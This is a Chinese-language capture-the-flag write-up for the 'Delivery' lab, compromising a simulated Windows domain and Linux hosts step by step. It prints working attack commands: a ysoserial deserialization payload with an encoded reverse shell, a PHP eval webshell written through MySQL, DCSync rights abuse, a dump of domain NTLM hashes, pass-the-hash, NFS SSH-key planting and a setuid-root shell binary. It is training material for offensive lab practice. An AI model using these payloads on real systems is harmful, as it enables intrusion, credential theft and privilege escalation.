春秋云境-Delivery

发表于 2025-05-24 分类于云境靶场

学习点

172.22.13.14	ubuntu	外网 Spring 服务器
172.22.13.57	centos	NFS 服务器
172.22.13.28	WIN-HAUWOLAO.xiaorang.lab	OA 办公平台、MySQL 弱口令 root/123456
172.22.13.6	WIN-DC.xiaorang.lab	域控

XStream

有匿名ftp，连接发现pom.xml有xstream，打CVE-2021-29505反序列化

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,...}|{base64,-d}|{bash,-i}"

fscan

[*] Icmp alive hosts len is: 4
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:139 open
172.22.13.28:8000 open
172.22.13.14:8080 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetInfo 
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] WebTitle http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] ftp 172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] NetBios 172.22.13.6     [+] DC:XIAORANG\WIN-DC         
[*] WebTitle http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql 172.22.13.28:3306:root 123456

横向WEB

内网web服务的mysql有弱口令，连上去正好是个phpstudy，写webshell

select "<?php @eval($_POST['pass']);?>" into outfile "C:\\phpstudy_pro\\www\\shell.php"

发现web服务是个SYSTEM权限，在域内，信息收集

C:/phpstudy_pro/WWW/ >net user /domain
\\WIN-DC.xiaorang.lab 的用户帐户
-------------------------------------------------------------
Administrator            chenglei                 Guest                    
krbtgt                   zhangtao                 zhangwen

发现chenglei是 ACL Admin 组用户，mimikatz抓到凭证 chenglei/Xt61f3LBhg1

ACL滥用

域用户 chenglei 属于 Acl admin 组用户，直接为用户添加Dcsync权限即可导出hash

Dacledit

impacket-dacledit xiaorang.lab/chenglei:Xt61f3LBhg1 -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250524-034234.bak
[*] DACL modified successfully!

Dcsync

impacket-secretsdump xiaorang.lab/chenglei:[email protected] -target-ip 172.22.13.6 -dc-ip 172.22.13.6 -just-dc-ntlm -user-status
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cb976ec1a1bf8a14a15142c6fecc540e::: (status=Disabled)
zhangwen:1104:aad3b435b51404eeaad3b435b51404ee:fa7d776fdfc82d3f43c9d8b7f5312d77::: (status=Enabled)
chenglei:1105:aad3b435b51404eeaad3b435b51404ee:0c00801c30594a1b8eaa889d237c5382::: (status=Enabled)
zhangtao:1106:aad3b435b51404eeaad3b435b51404ee:e786c4a4987ced162c496d0519496729::: (status=Enabled)
WIN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:473c26f05506785c543cec4ab896fc58::: (status=Enabled)
WIN-HAUWOLAO$:1103:aad3b435b51404eeaad3b435b51404ee:559508d63ea2452ac185ddc11dc872b5::: (status=Enabled)
[*] Cleaning up...

PTH

impacket-wmiexec xiaorang.lab/[email protected] -hashes :6341235defdaed66fb7b682665752c9a -codec GBK -shell-type powershell

NFS

nfs服务默认在2049端口，可以通过rpcinfo命令来确定主机上是否运行或挂载了NFS服务

proxychains4 -q rpcinfo -p 172.22.13.57

查看可被挂载的目录

proxychains4 -q showmount -e 172.22.13.57

发现是用户的home目录，可以挂载目录并尝试写入ssh，在挂载的时候在kali会卡住，转到入口机ubuntu安装nfs等服务：https://gist.github.com/zkryakgul/bb561235b7f36c57d15a015d20c7e336

挂载写入ssh

root@ubuntu:/tmp# mount -t nfs 172.22.13.57:/home/joyce /tmp/nfs_mount
root@ubuntu:/tmp# df -h
root@ubuntu:/tmp# ssh-keygen -t rsa -b 4096
root@ubuntu:/tmp# mkdir /tmp/nfs_mount/.ssh
root@ubuntu:/tmp# cd /tmp/nfs_mount/.ssh
root@ubuntu:/tmp# cat /root/.ssh/id_rsa.pub >> authorized_keys
root@ubuntu:/tmp# ssh [email protected]

suid发现ftp提权

ubuntu起一个ftp

python3 -m pyftpdlib -p 6666 -u test -P test -w &

nfs连接ftp，将txt推过去

ftp 172.22.13.14 6666
test/test
put /flag02.txt

还有一种提权方法，利用条件：no_root_squash 选项开启

root@ubuntu:/tmp# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
root@ubuntu:/tmp# gcc root.c -o root
root.c: In function ‘main’:
root.c:1:14: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |              ^~~~~~
root.c:1:25: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |                         ^~~~~~
root.c:1:36: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
      |                                    ^~~~~~
root@ubuntu:/tmp# chmod +s ./root
root@ubuntu:/tmp# mv ./root nfs_mount/


[joyce@centos tmp]$ cd ~
[joyce@centos ~]$ ls
root
[joyce@centos ~]$ ./root
[root@centos ~]# cat /flag*
 SSS  h           d                CCC            d           t         l     
S     h           d               C               d           t  ii     l     
 SSS  hhh   aa  ddd ooo w   w     C    rrr eee  ddd eee nnn  ttt     aa l  ss 
    S h  h a a d  d o o w w w     C    r   e e d  d e e n  n  t  ii a a l  s  
SSSS  h  h aaa  ddd ooo  w w       CCC r   ee   ddd ee  n  n  tt ii aaa l ss  


flag02: flag{955bc5d2-9fe2-446e-8009-927ae5b32cf2}

hint: relay race